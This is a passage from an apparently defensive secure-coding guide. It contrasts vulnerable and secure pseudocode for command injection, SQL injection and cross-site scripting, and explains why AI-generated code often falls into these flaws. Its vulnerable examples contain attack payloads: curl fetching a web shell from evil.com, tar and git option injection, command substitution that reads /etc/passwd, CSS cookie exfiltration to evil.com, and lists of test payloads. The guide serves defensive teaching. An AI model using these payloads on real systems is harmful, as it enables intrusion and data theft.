/etc/passwd > /tmp/out.txt)image.jpg" +// Result: File exfiltration via command substitution + +// VULNERABLE: Filename in archiving +function createBackup(filename): + command = f"tar -czf backup.tar.gz {filename}" + return shell.execute(command) + +// Attack: filename = "--checkpoint=1 --checkpoint-action=exec=sh\ shell.sh" +// Result: tar option injection (GTFOBins-style attack) +``` + +**Why This Is Dangerous:** +- Paths often contain attacker-controlled portions (uploaded filenames) +- Command-line tools have dangerous flag behaviors (GTFOBins) +- Argument injection even without shell metacharacters +- `$(...)` and backticks execute subcommands + +--- + +### BAD Example 3: Argument Injection + +```pseudocode +// VULNERABLE: Arguments from user input +function fetchUrl(url): + command = f"curl {url}" + return shell.execute(command) + +// Attack: url = "-o /var/www/html/shell.php http://evil.com/shell.php" +// Result: Writes file to webserver (web shell) + +// Attack: url = "--config /etc/passwd" +// Result: Error message reveals file contents + +// VULNERABLE: Git commands with user input +function cloneRepository(repoUrl): + command = f"git clone {repoUrl}" + return shell.execute(command) + +// Attack: repoUrl = "--upload-pack='touch /tmp/pwned' git://evil.com/repo" +// Result: Arbitrary command execution via git options +``` + +**Why This Is Dangerous:** +- Programs interpret flags anywhere in argument list +- Can override intended behavior via injected flags +- `--` doesn't always prevent injection (depends on program) +- Many tools have "write file" or "execute" options + +--- + +### BAD Example 4: Environment Variable Injection + +```pseudocode +// VULNERABLE: User-controlled environment variable +function runWithCustomPath(command, customPath): + environment = {"PATH": customPath} + return subprocess.run(command, env=environment, shell=True) + +// Attack: customPath = "/tmp/evil:$PATH" +// If /tmp/evil contains malicious 'ls' binary, it executes instead + +// VULNERABLE: Library path manipulation +function loadPlugin(pluginPath): + environment = {"LD_PRELOAD": pluginPath} + return subprocess.run("target-app", env=environment) + +// Attack: pluginPath = "/tmp/evil.so" +// Result: Malicious shared library loaded, code execution +``` + +**Why This Is Dangerous:** +- Environment variables affect program behavior in unexpected ways +- PATH hijacking allows executing attacker binaries +- LD_PRELOAD/DYLD_INSERT_LIBRARIES enable library injection +- Some programs read secrets from environment (unintended exposure) + +--- + +## GOOD Examples: Proper Patterns + +### GOOD Example 1: Parameterized Queries (All Major DB Patterns) + +```pseudocode +// SECURE: Parameterized query - positional parameters +function getUserById(userId): + query = "SELECT * FROM users WHERE id = ?" + return database.execute(query, [userId]) + +// SECURE: Named parameters +function getUserByEmailAndStatus(email, status): + query = "SELECT * FROM users WHERE email = :email AND status = :status" + return database.execute(query, {email: email, status: status}) + +// SECURE: Multiple value insertion +function createUser(name, email, role): + query = "INSERT INTO users (name, email, role) VALUES (?, ?, ?)" + return database.execute(query, [name, email, role]) + +// SECURE: IN clause with dynamic count +function getUsersByIds(userIds): + placeholders = ", ".join(["?" for _ in userIds]) + query = f"SELECT * FROM users WHERE id IN ({placeholders})" + return database.execute(query, userIds) + +// SECURE: Transaction with multiple parameterized queries +function transferFunds(fromId, toId, amount): + database.beginTransaction() + try: + database.execute("UPDATE accounts SET balance = balance - ? WHERE id = ?", [amount, fromId]) + database.execute("UPDATE accounts SET balance = balance + ? WHERE id = ?", [amount, toId]) + database.commit() + catch error: + database.rollback() + throw error +``` + +**Why This Is Secure:** +- Database driver separates query structure from data +- Parameters are never interpreted as SQL +- Works with all standard data types +- Prevents all SQL injection variants in value positions + +--- + +### GOOD Example 2: ORM Safe Usage + +```pseudocode +// SECURE: ORM with typed queries +function getUserById(userId): + return User.findOne({where: {id: userId}}) + +// SECURE: ORM with relationships +function getUserWithOrders(userId): + return User.findOne({ + where: {id: userId}, + include: [{model: Order, as: 'orders'}] + }) + +// SECURE: ORM query builder +function searchProducts(filters): + query = Product.query() + + if filters.category: + query = query.where('category', '=', filters.category) + if filters.minPrice: + query = query.where('price', '>=', filters.minPrice) + if filters.maxPrice: + query = query.where('price', '<=', filters.maxPrice) + + return query.get() + +// WARNING: ORM raw query - still needs parameterization! +function customQuery(userId): + // STILL VULNERABLE if using string interpolation: + // return database.raw(f"SELECT * FROM users WHERE id = {userId}") + + // SECURE: Use ORM's parameterization + return database.raw("SELECT * FROM users WHERE id = ?", [userId]) +``` + +**Why This Is Secure:** +- ORM handles parameterization automatically +- Type checking prevents some injection attempts +- Query builders construct safe queries programmatically +- Still requires care with raw queries + +--- + +### GOOD Example 3: Safe Dynamic Table/Column Names (Allowlist) + +```pseudocode +// SECURE: Allowlist for table names +ALLOWED_TABLES = {"users", "products", "orders", "categories"} + +function getDataFromTable(tableName, id): + if tableName not in ALLOWED_TABLES: + throw ValidationError("Invalid table name") + + // Safe because tableName is from allowlist, not user input + query = f"SELECT * FROM {tableName} WHERE id = ?" + return database.execute(query, [id]) + +// SECURE: Allowlist for sort columns +SORT_COLUMNS = { + "name": "name", + "price": "price", + "date": "created_at", + "popularity": "view_count" +} + +function getProducts(sortBy, sortOrder): + column = SORT_COLUMNS.get(sortBy, "name") // Default to 'name' + direction = "DESC" if sortOrder == "desc" else "ASC" + + query = f"SELECT * FROM products ORDER BY {column} {direction}" + return database.execute(query) + +// SECURE: Quoted identifiers as additional defense +function getDataDynamic(tableName, columnName, value): + if tableName not in ALLOWED_TABLES: + throw ValidationError("Invalid table") + if columnName not in ALLOWED_COLUMNS[tableName]: + throw ValidationError("Invalid column") + + // Use database quoting function for identifiers + quotedTable = database.quoteIdentifier(tableName) + quotedColumn = database.quoteIdentifier(columnName) + + query = f"SELECT * FROM {quotedTable} WHERE {quotedColumn} = ?" + return database.execute(query, [value]) +``` + +**Why This Is Secure:** +- Allowlist ensures only known-safe values used +- User input maps to predefined safe values +- Identifier quoting provides defense-in-depth +- Validation happens before query construction + +--- + +### GOOD Example 4: Safe Command Execution + +```pseudocode +// SECURE: Argument array (no shell interpretation) +function pingHost(hostname): + // Validate hostname format first + if not isValidHostname(hostname): + throw ValidationError("Invalid hostname format") + + // Use argument array - shell metacharacters are literal + result = subprocess.run( + ["ping", "-c", "4", hostname], + shell = false, // CRITICAL: no shell interpretation + capture_output = true, + timeout = 30 + ) + return result.stdout + +// SECURE: Allowlist for command arguments +ALLOWED_FORMATS = {"png", "jpg", "gif", "webp"} + +function convertImage(inputPath, outputPath, format): + // Validate format from allowlist + if format not in ALLOWED_FORMATS: + throw ValidationError("Invalid format") + + // Validate paths are within allowed directory + if not isPathWithinDirectory(inputPath, UPLOAD_DIR): + throw ValidationError("Invalid input path") + if not isPathWithinDirectory(outputPath, OUTPUT_DIR): + throw ValidationError("Invalid output path") + + // Safe argument array + result = subprocess.run( + ["convert", inputPath, "-resize", "800x600", f"{outputPath}.{format}"], + shell = false + ) + return result + +// SECURE: Using libraries instead of shell commands +function checkDiskUsage(directory): + // Use language-native library instead of shell + return filesystem.getDirectorySize(directory) + +function readJsonFile(filepath): + // Don't use: shell.execute(f"cat {filepath} | jq .") + // Use language JSON library + return json.parse(filesystem.readFile(filepath)) +``` + +**Why This Is Secure:** +- Argument arrays pass arguments directly to program +- No shell interpretation of metacharacters +- Allowlists prevent unexpected values +- Path validation prevents directory traversal +- Native libraries avoid shell entirely + +--- + +## Edge Cases Section + +### Edge Case 1: Second-Order Injection (Stored Then Executed) + +```pseudocode +// DANGEROUS: Data stored safely but used unsafely later + +// Step 1: User creates profile (looks safe) +function createProfile(userId, displayName): + // Parameterized - SAFE for initial storage + query = "INSERT INTO profiles (user_id, display_name) VALUES (?, ?)" + database.execute(query, [userId, displayName]) + // Attacker sets displayName = "admin'--" + +// Step 2: Background job uses stored data UNSAFELY +function generateReportForUser(userId): + // Get the stored display name + profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId]) + displayName = profile.display_name + // "admin'--" retrieved from database + + // VULNERABLE: Trusting data from database + reportQuery = f"INSERT INTO reports (title) VALUES ('Report for {displayName}')" + database.execute(reportQuery) + // Result: INSERT INTO reports (title) VALUES ('Report for admin'--') + +// SECURE: Parameterize ALL queries, even with "internal" data +function generateReportForUserSafe(userId): + profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId]) + + // Still parameterize even though data is from database + reportQuery = "INSERT INTO reports (title) VALUES (?)" + database.execute(reportQuery, [f"Report for {profile.display_name}"]) +``` + +**Detection:** Audit all code paths where database data is used in subsequent queries. + +--- + +### Edge Case 2: Injection in Stored Procedures + +```pseudocode +// DANGEROUS: Dynamic SQL inside stored procedure + +// Stored Procedure Definition (in database) +CREATE PROCEDURE searchUsers(searchTerm VARCHAR(100)) +BEGIN + // VULNERABLE: Dynamic SQL construction + SET @query = CONCAT('SELECT * FROM users WHERE name LIKE ''%', searchTerm, '%'''); + PREPARE stmt FROM @query; + EXECUTE stmt; +END + +// Application code looks safe... +function searchUsers(term): + return database.callProcedure("searchUsers", [term]) + // But injection still occurs inside the procedure! + +// SECURE: Parameterized even in stored procedures +CREATE PROCEDURE searchUsersSafe(searchTerm VARCHAR(100)) +BEGIN + // Use parameterization within procedure + SELECT * FROM users WHERE name LIKE CONCAT('%', searchTerm, '%'); + // Or use prepared statement properly + SET @query = 'SELECT * FROM users WHERE name LIKE ?'; + SET @search = CONCAT('%', searchTerm, '%'); + PREPARE stmt FROM @query; + EXECUTE stmt USING @search; +END +``` + +**Detection:** Review all stored procedures for dynamic SQL construction. + +--- + +### Edge Case 3: Injection Through Encoding Bypass + +```pseudocode +// DANGEROUS: Encoding-based bypass attempts + +// Scenario 1: Double-encoding bypass +function searchWithFilter(term): + // Application URL-decodes once + decoded = urlDecode(term) // %2527 -> %27 + + // WAF sees %27, not single quote + // Second decode happens: %27 -> ' + + query = f"SELECT * FROM items WHERE name = '{decoded}'" + // Injection succeeds + +// Scenario 2: Unicode normalization bypass +function filterUsername(username): + // Check for dangerous characters + if "'" in username or "\"" in username: + throw ValidationError("Invalid characters") + + // VULNERABLE: Unicode normalization happens AFTER validation + normalized = unicodeNormalize(username) + // 'ʼ' (U+02BC) might normalize to "'" (U+0027) in some systems + + query = f"SELECT * FROM users WHERE username = '{normalized}'" + +// SECURE: Parameterization makes encoding irrelevant +function searchSafe(term): + // Encoding doesn't matter - it's just data + query = "SELECT * FROM items WHERE name = ?" + return database.execute(query, [term]) + +// SECURE: Validate AFTER all normalization +function filterUsernameSafe(username): + // Normalize first + normalized = unicodeNormalize(username) + + // Then validate + if not isValidUsernameChars(normalized): + throw ValidationError("Invalid characters") + + // Then use (still with parameterization) + query = "SELECT * FROM users WHERE username = ?" + return database.execute(query, [normalized]) +``` + +**Detection:** Test with various encoded payloads (`%27`, `%2527`, Unicode variants). + +--- + +## Common Mistakes Section + +### Mistake 1: Thinking Escaping Is Enough + +```pseudocode +// DANGEROUS: Manual escaping is error-prone + +function getUserByNameEscaped(name): + // "Escaping" by replacing quotes + escapedName = name.replace("'", "''") + query = f"SELECT * FROM users WHERE name = '{escapedName}'" + return database.execute(query) + +// Problems with this approach: +// 1. Different databases have different escape rules +// 2. Multibyte character encoding bypasses (GBK, etc.) +// 3. Doesn't handle all injection vectors +// 4. Easy to forget in one place +// 5. Backslash escaping varies by database + +// Attack (MySQL with NO_BACKSLASH_ESCAPES off): +// name = "\' OR 1=1 --" +// Result: \'' OR 1=1 -- (backslash escapes first quote) + +// Attack (multibyte): name = 0xbf27 +// In GBK: 0xbf5c27 -> valid multibyte char + literal quote + +// ALWAYS USE PARAMETERIZATION - it's not about escaping +function getUserByNameSafe(name): + query = "SELECT * FROM users WHERE name = ?" + return database.execute(query, [name]) +``` + +**Key Insight:** Parameterization doesn't "escape" - it sends query structure and data separately. + +--- + +### Mistake 2: Trusting "Internal" Data Sources + +```pseudocode +// DANGEROUS: Trusting data because it's "internal" + +function processMessage(messageFromQueue): + // "This is from our internal queue, so it's safe" + userId = messageFromQueue.userId + + query = f"SELECT * FROM users WHERE id = {userId}" + return database.execute(query) + +// BUT: Where did that queue message originate? +// - User input that was serialized to queue +// - External API response stored in queue +// - Another service that has its own vulnerabilities + +// DANGEROUS: Trusting data from other tables/services +function getOrderDetails(orderId): + order = database.execute("SELECT * FROM orders WHERE id = ?", [orderId]) + + // Order.notes was user-supplied + query = f"SELECT * FROM notes WHERE content LIKE '%{order.notes}%'" + // Still vulnerable to second-order injection + +// SECURE: Parameterize ALL queries regardless of data source +function processMessageSafe(messageFromQueue): + query = "SELECT * FROM users WHERE id = ?" + return database.execute(query, [messageFromQueue.userId]) +``` + +**Rule:** Never trust ANY data in query construction - always parameterize. + +--- + +### Mistake 3: Partial Parameterization + +```pseudocode +// DANGEROUS: Parameterizing some parts but not others + +function searchUsers(name, sortColumn, limit): + // Parameterized the value, but not ORDER BY or LIMIT + query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortColumn} LIMIT {limit}" + return database.execute(query, [name]) + +// Attack: sortColumn = "1; DELETE FROM users; --" +// Attack: limit = "1 UNION SELECT password FROM admin_users" + +// DANGEROUS: Parameterized WHERE but not table +function getDataFlexible(tableName, filterColumn, filterValue): + query = f"SELECT * FROM {tableName} WHERE {filterColumn} = ?" + return database.execute(query, [filterValue]) + // Table name and column still injectable + +// SECURE: Validate/allowlist everything that can't be parameterized +function searchUsersSafe(name, sortColumn, limit): + // Allowlist for sort column + allowedSorts = {"name", "email", "created_at"} + sortCol = sortColumn if sortColumn in allowedSorts else "name" + + // Validate limit is positive integer + limitNum = min(max(int(limit), 1), 100) // Clamp to 1-100 + + query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortCol} LIMIT {limitNum}" + return database.execute(query, [name]) +``` + +**Key Insight:** Every injectable position needs either parameterization or allowlist validation. + +--- + +## Detection Hints and Testing Approaches + +### Automated Detection Patterns + +```pseudocode +// Regex patterns to find SQL injection vulnerabilities: + +// 1. String concatenation with SQL keywords +regex: /(SELECT|INSERT|UPDATE|DELETE|FROM|WHERE|ORDER BY).*(\+|\.concat|\$\{|f['"])/i + +// 2. Format strings with SQL +regex: /f["'].*\b(SELECT|INSERT|UPDATE|DELETE)\b.*\{.*\}/i + +// 3. String interpolation in queries +regex: /execute\s*\(\s*["`'].*\$\{?[a-zA-Z_]/ + +// Command injection patterns: + +// 4. Shell execution with concatenation +regex: /(system|exec|shell_exec|popen|subprocess\.run|os\.system)\s*\(.*(\+|\$\{|f['"])/ + +// 5. Shell=True with variables +regex: /shell\s*=\s*[Tt]rue.*\{|shell\s*=\s*[Tt]rue.*\+/ +``` + +### Manual Testing Approaches + +```pseudocode +// SQL Injection Test Payloads: + +basicTests = [ + "' OR '1'='1", // Basic auth bypass + "'; DROP TABLE test; --", // Stacked queries + "' UNION SELECT null--", // Union-based + "1 AND 1=1", // Boolean-based + "1' AND SLEEP(5)--", // Time-based blind +] + +// Command Injection Test Payloads: + +commandTests = [ + "; whoami", // Command chaining + "| id", // Pipe injection + "$(whoami)", // Command substitution + "`id`", // Backtick substitution + "& ping -c 4 attacker.com", // Background execution +] + +// Testing Methodology: +1. Identify all input points (forms, URLs, headers, JSON fields) +2. Trace input flow to database queries or shell commands +3. Inject test payloads at each point +4. Monitor for: + - SQL errors in response + - Time delays (for blind injection) + - DNS/HTTP callbacks (for out-of-band) + - Changed behavior indicating injection success +``` + +### Code Review Checklist + +| Check | What to Look For | +|-------|------------------| +| **Query Construction** | Any string concatenation or interpolation with query strings | +| **Dynamic Identifiers** | Table names, column names, ORDER BY from user input | +| **Raw Queries in ORM** | `.raw()`, `.execute()`, or similar with string building | +| **Shell Execution** | Any use of `system()`, `exec()`, `shell=True` | +| **Command Building** | String concatenation before command execution | +| **Input Sources** | Follow data from request to query/command | + +--- + +## Security Checklist + +- [ ] All SQL queries use parameterized statements or prepared queries +- [ ] ORM raw queries also use parameterization +- [ ] Dynamic table/column names validated against strict allowlist +- [ ] ORDER BY and LIMIT clauses use validated/allowlisted values +- [ ] No shell=True in subprocess calls +- [ ] All command-line arguments passed as arrays, not strings +- [ ] User-controlled file paths validated and sanitized +- [ ] Environment variables not set from user input +- [ ] Second-order injection considered (data from DB still parameterized) +- [ ] Stored procedures reviewed for internal dynamic SQL +- [ ] Input validation applied before any normalization/decoding +- [ ] Code review specifically checks all query/command construction + +--- + +# Pattern 3: Cross-Site Scripting (XSS) + +**CWE References:** CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-80 (Basic XSS), CWE-83 (Improper Neutralization in Attributes), CWE-87 (Improper Neutralization in URI) + +**Priority Score:** 23 (Frequency: 10, Severity: 8, Detectability: 5) + +--- + +## Introduction: Why AI Often Misses Context-Specific Encoding + +Cross-Site Scripting (XSS) is one of the most prevalent vulnerabilities in AI-generated code. Research shows that **86% of AI-generated code fails XSS defenses** (Veracode 2025), and AI-generated code is **2.74x more likely to contain XSS** than human-written code (CodeRabbit analysis). + +**Why AI Models Generate XSS Vulnerabilities:** + +1. **Context-Blindness:** XSS prevention requires understanding the *context* where user input will be rendered—HTML body, attributes, JavaScript, CSS, or URLs. Each context requires different encoding. AI models frequently apply generic or no encoding because they lack awareness of rendering context. + +2. **Training Data Shows innerHTML Everywhere:** Tutorials and Stack Overflow answers heavily use `innerHTML`, `document.write()`, and template string injection for DOM manipulation. AI learns these as standard patterns. + +3. **Framework Misunderstanding:** Modern frameworks like React provide automatic escaping, but AI often bypasses these safeguards using `dangerouslySetInnerHTML`, `v-html`, or raw template interpolation when the task seems to require "rich" HTML output. + +4. **Encoding vs. Validation Confusion:** AI models often implement input validation (checking what characters are allowed) but skip output encoding (safely rendering data in context). Validation is for data integrity; encoding is for XSS prevention. + +5. **Client-Side Trust:** AI frequently treats client-side code as "safe" since it runs in the browser. It fails to recognize that XSS attacks *exploit* the browser's trust in the application. + +**Impact of XSS:** + +- **Session Hijacking:** Attacker steals session cookies and impersonates victims +- **Account Takeover:** Keylogging, credential theft, or forced password changes +- **Data Exfiltration:** Stealing sensitive data displayed to the user +- **Malware Distribution:** Redirecting users to malicious sites +- **Defacement:** Altering page content for phishing or reputation damage +- **Worm Propagation:** Self-spreading XSS (Samy worm affected 1M MySpace users) + +**XSS Variants:** + +| Type | Storage | Execution | Example Vector | +|------|---------|-----------|----------------| +| **Reflected** | URL/Request | Immediate | Search query in results page | +| **Stored** | Database | Later visitors | Comment with script in blog | +| **DOM-based** | Client-side | JavaScript processes | URL fragment processed by JS | +| **Mutation (mXSS)** | Sanitizer bypass | DOM mutation | Markup that changes during parsing | + +--- + +## Multiple BAD Examples Across Contexts + +### BAD Example 1: HTML Body Injection + +```pseudocode +// VULNERABLE: Direct injection into HTML body +function displayUserComment(comment): + // User input directly placed in HTML + document.getElementById("comments").innerHTML = + "
" + comment + "
" + +// Attack: comment = "" +// Result: Script executes, cookies sent to attacker + +// VULNERABLE: Server-side template without encoding +function renderProfilePage(username, bio): + return """ + + +

Profile: {username}

+

{bio}

+ + + """.format(username=username, bio=bio) + +// Attack: bio = "" +// Result: onerror handler executes JavaScript + +// VULNERABLE: Using document.write +function showWelcome(name): + document.write("

Welcome, " + name + "!

") + +// Attack: name = "" +``` + +**Why This Is Dangerous:** +- Script tags execute immediately upon DOM insertion +- Event handlers (`onerror`, `onload`, `onclick`) execute without script tags +- SVG elements can contain executable code +- `document.write` and `innerHTML` interpret HTML in user input + +--- + +### BAD Example 2: HTML Attribute Injection + +```pseudocode +// VULNERABLE: User input in HTML attributes +function renderImage(imageUrl, altText): + return '' + altText + '' + +// Attack: altText = '" onmouseover="alert(document.cookie)" x="' +// Result: + +// VULNERABLE: Unquoted attributes +function renderLink(url, text): + return "" + text + "" + +// Attack: url = "http://site.com onclick=alert(1)" +// Result: text + +// VULNERABLE: Input in style attribute +function setBackgroundColor(color): + element.setAttribute("style", "background-color: " + color) + +// Attack: color = "red; background-image: url('javascript:alert(1)')" +// Attack: color = "expression(alert('XSS'))" // IE-specific + +// VULNERABLE: Event handler attribute +function renderButton(buttonId, label): + return '' + +// Attack: label = "'); alert(document.cookie); ('" +// Result: onclick="handleClick(''); alert(document.cookie); ('")" +``` + +**Why This Is Dangerous:** +- Unquoted attributes break at whitespace, allowing new attributes +- Quoted attributes can break out with matching quotes +- Event handler attributes execute JavaScript directly +- Certain attributes (`href`, `src`, `style`) have special parsing rules + +--- + +### BAD Example 3: JavaScript Context Injection + +```pseudocode +// VULNERABLE: User input embedded in JavaScript +function generateUserScript(username): + return """ + + """.format(username=username) + +// Attack: username = "'; alert(document.cookie); //'" +// Result: var currentUser = ''; alert(document.cookie); //'; + +// VULNERABLE: JSON data embedded in script +function embedUserData(userData): + return """ + + """.format(userData=jsonEncode(userData)) + +// Attack: userData contains +// JSON encoding doesn't prevent HTML context escape + +// VULNERABLE: Template literals with user input +function renderTemplate(message): + return `` + +// Attack: message = '${alert(document.cookie)}' // Template literal injection +// Attack: message = '");alert(document.cookie);//' // String escape + +// VULNERABLE: Dynamic script construction +function addEventHandler(eventName, userCallback): + element.setAttribute("onclick", "handleEvent('" + userCallback + "')") + +// Attack: userCallback = "'); stealData(); ('" +``` + +**Why This Is Dangerous:** +- JavaScript string context requires JavaScript-specific escaping +- HTML closing tags (``) can break out of script blocks +- Template literals have their own injection risks +- Inline event handlers compound HTML and JavaScript contexts + +--- + +### BAD Example 4: URL Context Injection + +```pseudocode +// VULNERABLE: User input in href attribute +function renderNavLink(destination): + return 'Click here' + +// Attack: destination = "javascript:alert(document.cookie)" +// Result: Click here + +// VULNERABLE: URL parameters without encoding +function buildSearchUrl(query): + return 'Search again' + +// Attack: query = '" onclick="alert(1)" x="' +// Result: Search again + +// VULNERABLE: Redirect based on user input +function handleRedirect(url): + window.location = url + +// Attack: url = "javascript:alert(document.cookie)" +// Result: JavaScript execution via location change + +// VULNERABLE: Open redirect leading to XSS +function redirectAfterLogin(returnUrl): + return '' + +// Attack: returnUrl = "data:text/html," +// Attack: returnUrl = "javascript:alert(1)" +``` + +**Why This Is Dangerous:** +- `javascript:` URLs execute code when navigated +- `data:` URLs can contain executable HTML/JavaScript +- `vbscript:` URLs execute on older IE +- URL encoding alone doesn't prevent protocol-based attacks + +--- + +### BAD Example 5: CSS Context Injection + +```pseudocode +// VULNERABLE: User input in CSS +function applyCustomStyle(customCss): + styleElement = document.createElement("style") + styleElement.textContent = ".user-style { " + customCss + " }" + document.head.appendChild(styleElement) + +// Attack: customCss = "} body { background: url('http://evil.com/log?data=' + document.cookie); } .x {" +// Result: CSS exfiltration of page data + +// VULNERABLE: CSS expression (legacy IE) +function setWidth(width): + element.style.cssText = "width: " + width + +// Attack: width = "expression(alert(document.cookie))" +// Result: JavaScript execution via CSS expression (IE) + +// VULNERABLE: CSS injection via style attribute +function renderAvatar(avatarUrl): + return '
' + +// Attack: avatarUrl = "x); } body { background: red; } .x { content: url(x" +// Modern Attack: avatarUrl = "https://evil.com/?' + btoa(document.body.innerHTML) + '" + +// VULNERABLE: CSS @import injection +function loadTheme(themeUrl): + return "" + +// Attack: themeUrl = "'); } * { background: url('http://evil.com/steal?" +``` + +**Why This Is Dangerous:** +- CSS can exfiltrate data via `url()` requests +- Legacy IE `expression()` executes JavaScript +- CSS injection can alter page appearance for phishing +- `@import` can load attacker-controlled stylesheets + +--- + +## GOOD Examples for Each Context + +### GOOD Example 1: Proper HTML Encoding + +```pseudocode +// SECURE: HTML entity encoding for body content +function htmlEncode(str): + return str + .replace("&", "&") // Must be first + .replace("<", "<") + .replace(">", ">") + .replace('"', """) + .replace("'", "'") + .replace("/", "/") // Prevents escapes + +function displayUserComment(comment): + safeComment = htmlEncode(comment) + document.getElementById("comments").innerHTML = + "
" + safeComment + "
" + +// SECURE: Using textContent instead of innerHTML +function displayUserCommentSafe(comment): + div = document.createElement("div") + div.className = "comment" + div.textContent = comment // Automatically safe - no HTML interpretation + document.getElementById("comments").appendChild(div) + +// SECURE: Server-side template with auto-escaping +function renderProfilePage(username, bio): + // Use templating engine with auto-escaping enabled + return template.render("profile.html", { + username: username, // Engine auto-escapes + bio: bio + }) + +// SECURE: Framework createElement pattern +function createUserCard(name, email): + card = document.createElement("article") + + nameEl = document.createElement("h3") + nameEl.textContent = name // Safe + + emailEl = document.createElement("p") + emailEl.textContent = email // Safe + + card.appendChild(nameEl) + card.appendChild(emailEl) + return card +``` + +**Why This Is Secure:** +- HTML entities are displayed as text, not interpreted as markup +- `textContent` never interprets HTML +- createElement + textContent is inherently safe +- Auto-escaping templates handle encoding automatically + +--- + +### GOOD Example 2: Proper Attribute Encoding + +```pseudocode +// SECURE: Attribute encoding (superset of HTML encoding) +function attributeEncode(str): + return str + .replace("&", "&") + .replace("<", "<") + .replace(">", ">") + .replace('"', """) + .replace("'", "'") + .replace("`", "`") + .replace("=", "=") + +// SECURE: Always quote attributes and encode values +function renderImage(imageUrl, altText): + safeUrl = attributeEncode(imageUrl) + safeAlt = attributeEncode(altText) + return '' + safeAlt + '' + +// SECURE: Using setAttribute (browser handles encoding) +function renderImageSafe(imageUrl, altText): + img = document.createElement("img") + img.setAttribute("src", imageUrl) // Safe + img.setAttribute("alt", altText) // Safe + return img + +// SECURE: Data attributes with proper encoding +function renderDataElement(userId, userName): + div = document.createElement("div") + div.dataset.userId = userId // Automatically safe + div.dataset.userName = userName // Automatically safe + return div + +// SECURE: Style attribute with validation +ALLOWED_COLORS = {"red", "blue", "green", "yellow", "#fff", "#000"} + +function setBackgroundColor(color): + if color in ALLOWED_COLORS: + element.style.backgroundColor = color + else: + element.style.backgroundColor = "white" // Safe default +``` + +**Why This Is Secure:** +- Quotes prevent attribute breakout +- Encoding prevents quote escapes +- setAttribute handles encoding automatically +- dataset properties are automatically safe +- Allowlists prevent injection of arbitrary values + +--- + +### GOOD Example 3: JavaScript Encoding + +```pseudocode +// SECURE: JavaScript string encoding +function jsStringEncode(str): + return str + .replace("\\", "\\\\") // Backslash first + .replace("'", "\\'") + .replace('"', '\\"') + .replace("\n", "\\n") + .replace("\r", "\\r") + .replace(" breakout + safeJson = htmlEncode(jsonData) + + return """ + + """.format(safeJson=safeJson) + +// BETTER: Use data attributes instead of inline scripts +function embedUserDataSafe(element, userData): + // Store data in attribute, process in external script + element.dataset.user = jsonEncode(userData) + // External script reads: JSON.parse(element.dataset.user) + +// SECURE: Separate data from code with JSON endpoint +function loadUserData(): + // Instead of embedding in HTML, fetch from API + fetch('/api/user/data') + .then(response => response.json()) + .then(data => processData(data)) + +// SECURE: Using structured data in script type +function embedStructuredData(pageData): + return """ + + + """.format(jsonData=jsonEncode(pageData)) +``` + +**Why This Is Secure:** +- JavaScript escaping prevents string breakout +- HTML encoding in script blocks prevents `` escape +- Data attributes separate data from code +- JSON endpoints avoid embedding untrusted data in HTML +- `type="application/json"` blocks aren't executed as JavaScript + +--- + +### GOOD Example 4: URL Encoding + +```pseudocode +// SECURE: URL encoding for query parameters +function urlEncode(str): + return encodeURIComponent(str) + +function buildSearchUrl(query): + safeQuery = urlEncode(query) + return '/search?q=' + safeQuery + +// SECURE: Validating URL schemes (allowlist) +SAFE_SCHEMES = {"http", "https", "mailto"} + +function validateUrl(url): + try: + parsed = parseUrl(url) + if parsed.scheme.lower() in SAFE_SCHEMES: + return url + catch: + pass + return "/fallback" // Safe default + +function renderLink(destination, text): + safeUrl = validateUrl(destination) + safeText = htmlEncode(text) + return '' + safeText + '' + +// SECURE: URL validation with additional checks +function validateExternalUrl(url): + parsed = parseUrl(url) + + // Check scheme + if parsed.scheme.lower() not in {"http", "https"}: + return null + + // Check for credential injection + if parsed.username or parsed.password: + return null + + // Check for IP address (optional restriction) + if isIpAddress(parsed.host): + return null + + return url + +// SECURE: Relative URLs only (prevent open redirect) +function validateRedirectUrl(url): + // Only allow relative paths + if url.startsWith("/") and not url.startsWith("//"): + // Prevent path traversal + normalized = normalizePath(url) + if not ".." in normalized: + return normalized + return "/" // Safe default +``` + +**Why This Is Secure:** +- `encodeURIComponent` handles special characters +- Scheme allowlist prevents `javascript:` and `data:` URLs +- Relative-only validation prevents open redirects +- Multiple validation layers provide defense in depth + +--- + +### GOOD Example 5: Using Safe APIs (textContent vs innerHTML) + +```pseudocode +// SECURE: Safe DOM manipulation patterns + +// Instead of innerHTML with user data: +// DANGEROUS: element.innerHTML = "

" + userInput + "

" + +// SECURE: Use textContent for text nodes +function setElementText(element, text): + element.textContent = text // Never interprets HTML + +// SECURE: Build DOM programmatically +function createListItem(text, isHighlighted): + li = document.createElement("li") + li.textContent = text // Safe text assignment + + if isHighlighted: + li.classList.add("highlighted") // Safe class manipulation + + return li + +// SECURE: Use template elements for complex HTML +function createCardFromTemplate(name, description): + template = document.getElementById("card-template") + card = template.content.cloneNode(true) + + // Set text content safely + card.querySelector(".card-name").textContent = name + card.querySelector(".card-desc").textContent = description + + return card + +// SECURE: Use DocumentFragment for batch operations +function renderList(items): + fragment = document.createDocumentFragment() + + for item in items: + li = document.createElement("li") + li.textContent = item.name // Safe + fragment.appendChild(li) + + document.getElementById("list").appendChild(fragment) + +// SECURE: Sanitize when HTML is genuinely needed +function renderRichContent(htmlContent): + // Use DOMPurify or similar trusted sanitizer + sanitized = DOMPurify.sanitize(htmlContent, { + ALLOWED_TAGS: ["b", "i", "em", "strong", "a", "p", "br"], + ALLOWED_ATTR: ["href"], + ALLOW_DATA_ATTR: false + }) + element.innerHTML = sanitized +``` + +**Why This Is Secure:** +- `textContent` never interprets HTML or scripts +- `createElement` + `textContent` is inherently safe +- Templates allow complex HTML without injection risk +- DOMPurify provides sanitization when HTML is required + +--- + +## Edge Cases Section + +### Edge Case 1: Mutation XSS (mXSS) + +```pseudocode +// DANGEROUS: Browser mutations can bypass sanitization + +// How mXSS works: +// 1. Sanitizer processes malformed HTML +// 2. Browser "fixes" the HTML during parsing +// 3. Fixed HTML contains executable content + +// Example: Backtick mutation +inputHtml = "" +// Some sanitizers don't escape backticks +// Browser may convert backticks to quotes in certain contexts + +// Example: Namespace confusion +inputHtml = "" +// SVG/MathML namespaces have different parsing rules +// Sanitizer might miss the nested script + +// Example: Table element mutations +inputHtml = "
" +// Browser moves
